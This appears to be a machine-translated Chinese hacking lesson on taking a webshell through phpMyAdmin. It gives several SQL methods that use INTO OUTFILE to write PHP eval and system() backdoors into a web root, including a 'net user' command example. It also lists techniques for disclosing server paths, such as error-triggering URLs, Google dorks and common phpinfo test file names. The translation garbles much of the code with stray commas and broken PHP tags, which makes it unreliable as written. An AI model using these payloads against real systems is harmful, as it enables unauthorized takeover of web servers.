phpmyadmin各种方法拿webshell（PhpMyAdmin various ways to get webshell）.docVIP

phpmyadmin各种方法拿webshell（PhpMyAdmin various ways to get webshell） Twenty-ninth lesson phpMyAdmin various skills, take webshell Author: Darkmoon blog: B/phpMyAdmin B/sql D:\wamp\www Account number and password Root password First kind CREATE, TABLE, `mysql`.`darkmoon` (`darkmoon1`, TEXT, NOT, NULL); INSERT INTO `mysql`.`darkmoon` (`darkmoon1`) VALUES (? PHP @eval ($_POST[pass]);? ); SELECT, `darkmoon1`, FROM, `darkmoon`, INTO, OUTFILE,d:/wamp/www/darkmoon.php; DROP, TABLE, IF, EXISTS, `darkmoon`; Second methods Create, TABLE, moon (Darkmoon, text, NOT, NULL); Insert INTO moon (Darkmoon) VALUES (? PHP @eval ($_POST[pass]);? ); Select, Darkmoon, from, moon, into, outfile,d:/wamp/www/darkmoon2.php; Drop, TABLE, IF, EXISTS, moon; Third methods: Select? PHP @eval ($_POST[pass]); INTO OUTFILEd:/wamp/www/darkmoon3.php? Fourth methods Select PHP echo? \pre\; system ($_GET[\cmd\]); echo \/pre\; INTO OUTFILEd:/wamp/www/darkmoon4.php? /darkmoon4.php? Cmd=net user? PHP all of the crit paths 1, single quote burst path Explain： Single quotes are added directly behind URL, requiring single quotation marks to not be filtered (gpc=off), and the server defaults to error messages. W/news.php? Id=149 ? 2 、 error parameter explosion path Explain： Change the value of the parameter to be submitted to an error value, such as -1. When -99999 single quotes are filtered, you might as well try. W/researcharchive.php? Id=-1? 3, Google explosion path Explain： Combine keyword and site syntax to search for page snapshots of error pages. Common keywords include warning and fatal error. Note that if the target site is a two domain name, the site meets its corresponding top-level domain name, which gives much more information. Site:.tw warning Site:.tw fatal error 4, test file burst path Explain： There are test files in the root directory of many websites, and script code is usually phpinfo (). W/test.php W/ceshi.php W/info.php W/phpinfo.php W/php_info.php W/1.php 5, phpMyAdmin explosion path Explain